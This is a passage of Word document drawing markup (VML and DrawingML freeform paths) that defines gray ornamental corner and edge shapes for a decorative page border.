                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8929" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8887" y="117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="50" y="117"/>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922858105" name="Freeform 58"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="5536" y="4020"/>
                            <a:ext cx="7" cy="2446"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 0 w 42"/>
                              <a:gd name="T1" fmla="*/ 14556 h 14653"/>
                              <a:gd name="T2" fmla="*/ 42 w 42"/>
                              <a:gd name="T3" fmla="*/ 14653 h 14653"/>
                              <a:gd name="T4" fmla="*/ 42 w 42"/>
                              <a:gd name="T5" fmla="*/ 0 h 14653"/>
                              <a:gd name="T6" fmla="*/ 0 w 42"/>
                              <a:gd name="T7" fmla="*/ 117 h 14653"/>
                              <a:gd name="T8" fmla="*/ 0 w 42"/>
                              <a:gd name="T9" fmla="*/ 14556 h 14653"/>
                            </a:gdLst>
                            <a:ahLst/>
                            <a:cxnLst>
                              <a:cxn ang="0">
                                <a:pos x="T0" y="T1"/>
                              </a:cxn>
                              <a:cxn ang="0">
                                <a:pos x="T2" y="T3"/>
                              </a:cxn>
                              <a:cxn ang="0">
                                <a:pos x="T4" y="T5"/>
                              </a:cxn>
                              <a:cxn ang="0">
                                <a:pos x="T6" y="T7"/>
                              </a:cxn>
                              <a:cxn ang="0">
                                <a:pos x="T8" y="T9"/>
                              </a:cxn>
                            </a:cxnLst>
                            <a:rect l="0" t="0" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="42" h="14653">
                                <a:moveTo>
                                  <a:pt x="0" y="14556"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="42" y="14653"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="42" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="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1059875710" name="Freeform 59"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="5536" y="6450"/>
                            <a:ext cx="1490" cy="16"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 50 w 8929"/>
                              <a:gd name="T1" fmla="*/ 0 h 97"/>
                              <a:gd name="T2" fmla="*/ 0 w 8929"/>
                              <a:gd name="T3" fmla="*/ 97 h 97"/>
                              <a:gd name="T4" fmla="*/ 8929 w 8929"/>
                              <a:gd name="T5" fmla="*/ 97 h 97"/>
                              <a:gd name="T6" fmla="*/ 8887 w 8929"/>
                              <a:gd name="T7" fmla="*/ 0 h 97"/>
                              <a:gd name="T8" fmla="*/ 50 w 8929"/>
                              <a:gd name="T9" fmla="*/ 0 h 97"/>
                            </a:gdLst>
                            <a:ahLst/>
                            <a:cxnLst>
                              <a:cxn ang="0">
                                <a:pos x="T0" y="T1"/>
                              </a:cxn>
                              <a:cxn ang="0">
                                <a:pos x="T2" y="T3"/>
                              </a:cxn>
                              <a:cxn ang="0">
                                <a:pos x="T4" y="T5"/>
                              </a:cxn>
                              <a:cxn ang="0">
                                <a:pos x="T6" y="T7"/>
                              </a:cxn>
                              <a:cxn ang="0">
                                <a:pos x="T8" y="T9"/>
                              </a:cxn>
                            </a:cxnLst>
                            <a:rect l="0" t="0" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="8929" h="97">
                                <a:moveTo>
                                  <a:pt x="50" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8929" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8887" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="50" y="0"/>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1986560910" name="Freeform 60"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="7018" y="4020"/>
                            <a:ext cx="8" cy="2446"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 50 w 50"/>
                              <a:gd name="T1" fmla="*/ 14556 h 14653"/>
                              <a:gd name="T2" fmla="*/ 0 w 50"/>
                              <a:gd name="T3" fmla="*/ 14653 h 14653"/>
                              <a:gd name="T4" fmla="*/ 0 w 50"/>
                              <a:gd name="T5" fmla="*/ 0 h 14653"/>
                              <a:gd name="T6" fmla="*/ 50 w 50"/>
                              <a:gd name="T7" fmla="*/ 117 h 14653"/>
                              <a:gd name="T8" fmla="*/ 50 w 50"/>
                              <a:gd name="T9" fmla="*/ 14556 h 14653"/>
                            </a:gdLst>
                            <a:ahLst/>
                            <a:cxnLst>
                              <a:cxn ang="0">
                                <a:pos x="T0" y="T1"/>
                              </a:cxn>
                              <a:cxn ang="0">
                                <a:pos x="T2" y="T3"/>
                              </a:cxn>
                              <a:cxn ang="0">
                                <a:pos x="T4" y="T5"/>
                              </a:cxn>
                              <a:cxn ang="0">
                                <a:pos x="T6" y="T7"/>
                              </a:cxn>
                              <a:cxn ang="0">
                                <a:pos x="T8" y="T9"/>
                              </a:cxn>
                            </a:cxnLst>
                            <a:rect l="0" t="0" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="50" h="14653">
                                <a:moveTo>
                                  <a:pt x="50" y="14556"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="14653"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="50" y="117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5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416BD" id="Group 1058614971" o:spid="_x0000_s1026" style="position:absolute;margin-left:-16.9pt;margin-top:-4.05pt;width:497.25pt;height:636.1pt;z-index:251659264" coordorigin="5536,4020" coordsize="1490,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" o:allowincell="f">
                <v:shape id="Freeform 5" o:spid="_x0000_s1027" style="position:absolute;left:5598;top:4056;width:89;height:198;flip:x;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="53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" path="m132,311r16,19l140,389r-16,58l124,544r8,117l173,797r50,78l280,895r50,-20l371,797,445,583,461,467r-8,-59l445,350r-9,-59l445,252r16,-97l478,77r8,-39l494,r8,19l527,116r8,117l535,350,519,467,469,681,404,875r-58,136l288,1089r-49,59l190,1187r-42,l107,1148,42,1050,9,953,,836,,719,9,603,33,486,58,408,91,350r41,-39xe" fillcolor="gray" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="22,52;25,55;23,65;21,75;21,91;22,110;29,133;37,146;47,149;55,146;62,133;74,97;77,78;75,68;74,58;73,49;74,42;77,26;80,13;81,6;82,0;84,3;88,19;89,39;89,58;86,78;78,114;67,146;58,169;48,182;40,191;32,198;25,198;18,191;7,175;1,159;0,139;0,120;1,101;5,81;10,68;15,58;22,52" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 6" o:spid="_x0000_s1028" style="position:absolute;left:5550;top:4173;width:82;height:211;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" path="m362,934r-9,-39l337,934r-25,20l271,973,213,954,164,856,123,720,115,603,131,467r25,-97l246,195r58,-39l329,175r16,39l370,234r25,-39l427,156r33,-39l477,97r16,l485,78,444,19,403,,353,,304,19,205,136,123,292,74,448,32,564,8,701,,798,,915r8,97l57,1168r33,58l139,1265r50,l246,1226r42,-39l329,1129r24,-98l362,934xe" fillcolor="gray" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="60,156;59,149;56,156;52,159;45,162;35,159;27,143;20,120;19,101;22,78;26,62;41,33;51,26;55,29;57,36;62,39;66,33;71,26;77,20;79,16;82,16;81,13;74,3;67,0;59,0;51,3;34,23;20,49;12,75;5,94;1,117;0,133;0,153;1,169;9,195;15,204;23,211;31,211;41,204;48,198;55,188;59,172;60,156" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 7" o:spid="_x0000_s1029" style="position:absolute;left:5557;top:4072;width:127;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" path="m757,r8,97l749,253r-9,117l757,467r-8,19l740,506,724,486r-33,20l609,584,510,700,411,875r-49,156l304,1206r-24,214l271,1537r17,97l288,1693r,19l255,1732r-58,-20l173,1712r-66,39l25,1790,8,1809r-8,l,1790r,-58l25,1537,41,1401r,-59l25,1206r8,-97l49,1109r17,19l115,1148r49,l247,1070,329,953,395,817,461,603,518,370,551,155r,-58l551,58r,-39l568,19r41,39l658,39,716,r41,xe" fillcolor="gray" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="126,0;127,16;124,42;123,62;126,78;124,81;123,84;120,81;115,84;101,97;85,117;68,146;60,172;50,201;46,237;45,257;48,273;48,283;48,286;42,289;33,286;29,286;18,292;4,299;1,302;0,302;0,299;0,289;4,257;7,234;7,224;4,201;5,185;8,185;11,188;19,192;27,192;41,179;55,159;66,136;77,101;86,62;91,26;91,16;91,10;91,3;94,3;101,10;109,7;119,0;126,0" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 8" o:spid="_x0000_s1030" style="position:absolute;left:6873;top:4056;width:90;height:198;flip:x;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="53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" path="m395,311r-17,19l395,389r8,58l411,544r-8,117l362,797r-58,78l247,895,197,875,156,797,82,583,66,467r8,-59l90,350r9,-59l82,252,66,155,49,77,41,38,41,,33,19,8,116,,233,,350,8,467,57,681r66,194l189,1011r49,78l296,1148r41,39l387,1187r41,-39l493,1050r25,-97l535,836r,-117l518,603,502,486,469,408,436,350,395,311xe" fillcolor="gray" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="66,52;64,55;66,65;68,75;69,91;68,110;61,133;51,146;42,149;33,146;26,133;14,97;11,78;12,68;15,58;17,49;14,42;11,26;8,13;7,6;7,0;6,3;1,19;0,39;0,58;1,78;10,114;21,146;32,169;40,182;50,191;57,198;65,198;72,191;83,175;87,159;90,139;90,120;87,101;84,81;79,68;73,58;66,52" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 9" o:spid="_x0000_s1031" style="position:absolute;left:6929;top:4173;width:82;height:211;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" path="m123,934r8,-39l156,934r25,20l222,973r49,-19l329,856,362,720r8,-117l362,467,329,370,238,195,189,156r-25,19l140,214r-25,20l98,195,66,156,24,117,8,97,,97,8,78,49,19,90,r50,l189,19r91,117l362,292r57,156l452,564r25,137l493,798r,117l477,1012r-41,156l395,1226r-50,39l296,1265r-49,-39l197,1187r-33,-58l140,1031,123,934xe" fillcolor="gray" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="20,156;22,149;26,156;30,159;37,162;45,159;55,143;60,120;62,101;60,78;55,62;40,33;31,26;27,29;23,36;19,39;16,33;11,26;4,20;1,16;0,16;1,13;8,3;15,0;23,0;31,3;47,23;60,49;70,75;75,94;79,117;82,133;82,153;79,169;73,195;66,204;57,211;49,211;41,204;33,198;27,188;23,172;20,156" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 10" o:spid="_x0000_s1032" style="position:absolute;left:6876;top:4072;width:128;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" path="m8,l,97,16,253r9,117l8,467r,19l25,506,41,486r25,20l156,584r99,116l346,875r57,156l452,1206r33,214l485,1537r-8,97l469,1693r,19l510,1732r58,-20l592,1712r58,39l732,1790r25,19l765,1809r,-19l757,1732,740,1537,724,1401r,-59l732,1206r-8,-97l716,1109r-25,19l642,1148r-41,l510,1070,428,953,370,817,296,603,247,370,214,155,206,97r8,-39l206,19r-9,l156,58,107,39,41,,8,xe" fillcolor="gray" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1,0;0,16;3,42;4,62;1,78;1,81;4,84;7,81;11,84;26,97;43,117;58,146;67,172;76,201;81,237;81,257;80,273;78,283;78,286;85,289;95,286;99,286;109,292;122,299;127,302;128,302;128,299;127,289;124,257;121,234;121,224;122,201;121,185;120,185;116,188;107,192;101,192;85,179;72,159;62,136;50,101;41,62;36,26;34,16;36,10;34,3;33,3;26,10;18,7;7,0;1,0" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 11" o:spid="_x0000_s1033" style="position:absolute;left:5598;top:6235;width:89;height:195;flip:x;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5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" path="m132,857r16,-20l140,798,124,740r,-97l132,506,173,390r50,-98l280,273r50,39l371,370r74,214l461,720r-8,59l445,818r-9,58l445,935r16,77l478,1090r8,59l494,1168r8,-19l527,1051r8,-97l535,837,519,720,469,487,404,292,346,176,288,78,239,20,190,,148,,107,20,42,137,9,234,,331,,468,9,584r24,98l58,779r33,58l132,857xe" fillcolor="gray" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="22,143;25,140;23,133;21,124;21,107;22,84;29,65;37,49;47,46;55,52;62,62;74,98;77,120;75,130;74,137;73,146;74,156;77,169;80,182;81,192;82,195;84,192;88,175;89,159;89,140;86,120;78,81;67,49;58,29;48,13;40,3;32,0;25,0;18,3;7,23;1,39;0,55;0,78;1,98;5,114;10,130;15,140;22,143" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 12" o:spid="_x0000_s1034" style="position:absolute;left:5550;top:6105;width:82;height:212;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" path="m362,311r-9,39l337,331,312,292,271,273r-58,38l164,389,123,526r-8,136l131,778r25,98l246,1051r58,39l329,1070r16,-19l370,1031r25,20l427,1090r33,39l477,1148r16,l485,1187r-41,59l403,1265r-50,l304,1226,205,1109,123,954,74,817,32,681,8,564,,448,,350,8,253,57,97,90,20,139,r50,l246,20r42,58l329,136r24,78l362,311xe" fillcolor="gray" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="60,52;59,59;56,55;52,49;45,46;35,52;27,65;20,88;19,111;22,130;26,147;41,176;51,183;55,179;57,176;62,173;66,176;71,183;77,189;79,192;82,192;81,199;74,209;67,212;59,212;51,205;34,186;20,160;12,137;5,114;1,95;0,75;0,59;1,42;9,16;15,3;23,0;31,0;41,3;48,13;55,23;59,36;60,52" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 13" o:spid="_x0000_s1035" style="position:absolute;left:5557;top:6115;width:127;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" path="m757,1790r8,-98l749,1556r-9,-117l757,1342r-8,-39l740,1303r-16,l691,1303r-82,-78l510,1089,411,934,362,778,304,583,280,369r-9,-97l288,155r,-39l288,77,255,58,197,97r-24,l107,58,25,,8,,,,,19,,58,25,252,41,408r,59l25,603r,39l33,681r16,l66,661r49,-19l164,661r83,58l329,856r66,116l461,1187r57,252l551,1634r,78l551,1751r,19l568,1790r41,-39l658,1770r58,39l757,1790xe" fillcolor="gray" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="126,299;127,282;124,260;123,240;126,224;124,218;123,218;120,218;115,218;101,205;85,182;68,156;60,130;50,97;46,62;45,45;48,26;48,19;48,13;42,10;33,16;29,16;18,10;4,0;1,0;0,0;0,3;0,10;4,42;7,68;7,78;4,101;4,107;5,114;8,114;11,110;19,107;27,110;41,120;55,143;66,162;77,198;86,240;91,273;91,286;91,292;91,295;94,299;101,292;109,295;119,302;126,299" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 14" o:spid="_x0000_s1036" style="position:absolute;left:6873;top:6235;width:90;height:195;flip:x;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5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" path="m395,857l378,837r17,-39l403,740r8,-97l403,506,362,390,304,292,247,273r-50,39l156,370,82,584,66,720r8,59l90,818r9,58l82,935r-16,77l49,1090r-8,59l41,1168r-8,-19l8,1051,,954,,837,8,720,57,487,123,292,189,176,238,78,296,20,337,r50,l428,20r65,117l518,234r17,97l535,468,518,584r-16,98l469,779r-33,58l395,857xe" fillcolor="gray" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="66,143;64,140;66,133;68,124;69,107;68,84;61,65;51,49;42,46;33,52;26,62;14,98;11,120;12,130;15,137;17,146;14,156;11,169;8,182;7,192;7,195;6,192;1,175;0,159;0,140;1,120;10,81;21,49;32,29;40,13;50,3;57,0;65,0;72,3;83,23;87,39;90,55;90,78;87,98;84,114;79,130;73,140;66,143" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 15" o:spid="_x0000_s1037" style="position:absolute;left:6929;top:6105;width:82;height:212;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" path="m123,311r8,39l156,331r25,-39l222,273r49,38l329,389r33,137l370,662r-8,116l329,876r-91,175l189,1090r-25,-20l140,1051r-25,-20l98,1051r-32,39l24,1129,8,1148r-8,l8,1187r41,59l90,1265r50,l189,1226r91,-117l362,954,419,817,452,681,477,564,493,448r,-98l477,253,436,97,395,20,345,,296,,247,20,197,78r-33,58l140,214r-17,97xe" fillcolor="gray" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="20,52;22,59;26,55;30,49;37,46;45,52;55,65;60,88;62,111;60,130;55,147;40,176;31,183;27,179;23,176;19,173;16,176;11,183;4,189;1,192;0,192;1,199;8,209;15,212;23,212;31,205;47,186;60,160;70,137;75,114;79,95;82,75;82,59;79,42;73,16;66,3;57,0;49,0;41,3;33,13;27,23;23,36;20,52" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 16" o:spid="_x0000_s1038" style="position:absolute;left:6876;top:6115;width:128;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" path="m8,1790l,1692,16,1556r9,-117l8,1342r,-39l25,1303r16,l66,1303r90,-78l255,1089,346,934,403,778,452,583,485,369r,-97l477,155r-8,-39l469,77,510,58r58,39l592,97,650,58,732,r25,l765,r,19l757,58,740,252,724,408r,59l732,603r,39l724,681r-8,l691,661,642,642r-41,19l510,719,428,856,370,972r-74,215l247,1439r-33,195l206,1712r8,39l206,1770r-9,20l156,1751r-49,19l41,1809,8,1790xe" fillcolor="gray" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1,299;0,282;3,260;4,240;1,224;1,218;4,218;7,218;11,218;26,205;43,182;58,156;67,130;76,97;81,62;81,45;80,26;78,19;78,13;85,10;95,16;99,16;109,10;122,0;127,0;128,0;128,3;127,10;124,42;121,68;121,78;122,101;122,107;121,114;120,114;116,110;107,107;101,110;85,120;72,143;62,162;50,198;41,240;36,273;34,286;36,292;34,295;33,299;26,292;18,295;7,302;1,299" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 17" o:spid="_x0000_s1039" style="position:absolute;left:5631;top:4251;width:47;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" path="m165,603r32,39l230,642r,-78l222,448r8,-176l247,175,272,39r8,-19l272,,255,39r-33,78l140,331,49,545,16,603,8,642,,681r16,l58,662,99,642r33,-39l148,603r17,xe" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="28,100;33,107;39,107;39,94;37,74;39,45;41,29;46,6;47,3;46,0;43,6;37,19;23,55;8,90;3,100;1,107;0,113;3,113;10,110;17,107;22,100;25,100;28,100" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 18" o:spid="_x0000_s1040" style="position:absolute;left:5609;top:4238;width:14;height:87;flip:x;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8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" path="m58,l17,136,,292,8,409r17,97l49,526,66,487,82,467,74,428,49,312,41,214r8,-97l66,39,66,,58,xe" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="10,0;3,22;0,48;1,68;4,84;8,87;11,81;14,77;13,71;8,52;7,35;8,19;11,6;11,0;10,0" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 19" o:spid="_x0000_s1041" style="position:absolute;left:5588;top:4342;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" path="m16,136r33,58l99,214r49,l197,175r17,-19l214,136r-8,l189,136,115,117,74,78,41,19,25,,8,39,,78r16,58xe" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3,22;8,32;17,35;25,35;33,29;36,26;36,22;35,22;32,22;19,19;12,13;7,3;4,0;1,6;0,13;3,22" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 20" o:spid="_x0000_s1042" style="position:absolute;left:5558;top:4189;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" path="m8,20r33,l74,78,91,98,107,78,165,20,173,,156,,107,20r-16,l58,,17,,,20,,39,8,20xe" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1,3;7,3;12,13;15,16;18,13;28,3;29,0;26,0;18,3;15,3;10,0;3,0;0,3;0,6;1,3" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 21" o:spid="_x0000_s1043" style="position:absolute;left:5559;top:4082;width:46;height:107;flip:x;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2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" path="m,623l17,603,49,526,132,331,214,117,247,39,263,r9,20l272,78,247,234r,78l255,389r,20l247,409r-49,l140,467,74,545,25,623,,642,,623xe" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,104;3,101;8,88;22,55;36,20;42,7;44,0;46,3;46,13;42,39;42,52;43,65;43,68;42,68;33,68;24,78;13,91;4,104;0,107;0,104" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 22" o:spid="_x0000_s1044" style="position:absolute;left:5601;top:4062;width:8;height:78;flip:x;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5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" path="m17,20l,117r,39l9,195r8,78l17,409,9,448r8,19l17,467r8,-19l42,351,50,234,42,117,25,r,l17,20xe" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3,3;0,20;0,26;1,33;3,46;3,68;1,75;3,78;3,78;4,75;7,59;8,39;7,20;4,0;4,0;3,3" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 23" o:spid="_x0000_s1045" style="position:absolute;left:5629;top:4208;width:39;height:36;flip:x;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2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" path="m230,20r-49,97l123,195,57,214,32,195,8,156,,117,,78r8,l24,78r41,39l123,117,181,78,222,20,230,r,20xe" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="39,3;31,20;21,33;10,36;5,33;1,26;0,20;0,13;1,13;4,13;11,20;21,20;31,13;38,3;39,0;39,3" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 24" o:spid="_x0000_s1046" style="position:absolute;left:5665;top:4117;width:14;height:75;flip:x;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m82,448r-25,l33,409,8,331,,253,8,156,49,39,57,r9,l74,20,66,78r-9,58l57,195r9,117l82,389r,59xe" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="14,75;10,75;6,68;1,55;0,42;1,26;8,7;10,0;11,0;13,3;11,13;10,23;10,33;11,52;14,65;14,75" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 25" o:spid="_x0000_s1047" style="position:absolute;left:6884;top:4251;width:47;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" path="m123,603l82,642r-33,l49,564,66,448,58,272,41,175,8,39,,20,8,,25,39r33,78l148,331r91,214l263,603r17,39l280,681r-8,l230,662,189,642,148,603r-8,l123,603xe" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="21,100;14,107;8,107;8,94;11,74;10,45;7,29;1,6;0,3;1,0;4,6;10,19;25,55;40,90;44,100;47,107;47,113;46,113;39,110;32,107;25,100;23,100;21,100" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 26" o:spid="_x0000_s1048" style="position:absolute;left:6939;top:4238;width:13;height:87;flip:x;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="7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" path="m16,l57,136,74,292r,117l49,506,33,526,8,487,,467,,428,24,312,41,214,33,117,8,39,8,r8,xe" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3,0;10,22;13,48;13,68;9,84;6,87;1,81;0,77;0,71;4,52;7,35;6,19;1,6;1,0;3,0" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 27" o:spid="_x0000_s1049" style="position:absolute;left:6938;top:4342;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" path="m206,136r-41,58l115,214r-49,l16,175,,156,,136r8,l33,136r74,-19l140,78,173,19,189,r17,39l214,78r-8,58xe" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="35,22;28,32;19,35;11,35;3,29;0,26;0,22;1,22;6,22;18,19;24,13;29,3;32,0;35,6;36,13;35,22" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 28" o:spid="_x0000_s1050" style="position:absolute;left:6974;top:4189;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" path="m156,20r-32,l91,78,74,98,58,78,,20,,,8,,66,20r16,l115,r41,l165,20r8,19l156,20xe" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="26,3;21,3;15,13;12,16;10,13;0,3;0,0;1,0;11,3;14,3;19,0;26,0;28,3;29,6;26,3" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 29" o:spid="_x0000_s1051" style="position:absolute;left:6957;top:4082;width:44;height:107;flip:x;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2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" path="m264,623r-9,-20l223,526,140,331,50,117,17,39,,,,20,,78,17,234r,78l9,389r,20l17,409r49,l132,467r66,78l239,623r25,19l264,623xe" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="44,104;43,101;37,88;23,55;8,20;3,7;0,0;0,3;0,13;3,39;3,52;2,65;2,68;3,68;11,68;22,78;33,91;40,104;44,107;44,104" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Freeform 30" o:spid="_x0000_s1052" style="position:absolute;left:6953;top:4062;width:7;height:78;flip:x;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m25,20r16,97l41,156r-8,39l25,273r8,136l33,448r,19l25,467,17,448,,351,,234,,117,17,r8,l25,20xe" strokeweight="1pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4,3;7,20;7,26;6,33;4,46;6,68;6,75;6,78;4,78;3,75;0,59;0,39;0,20;3,0;4,0;4,3" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
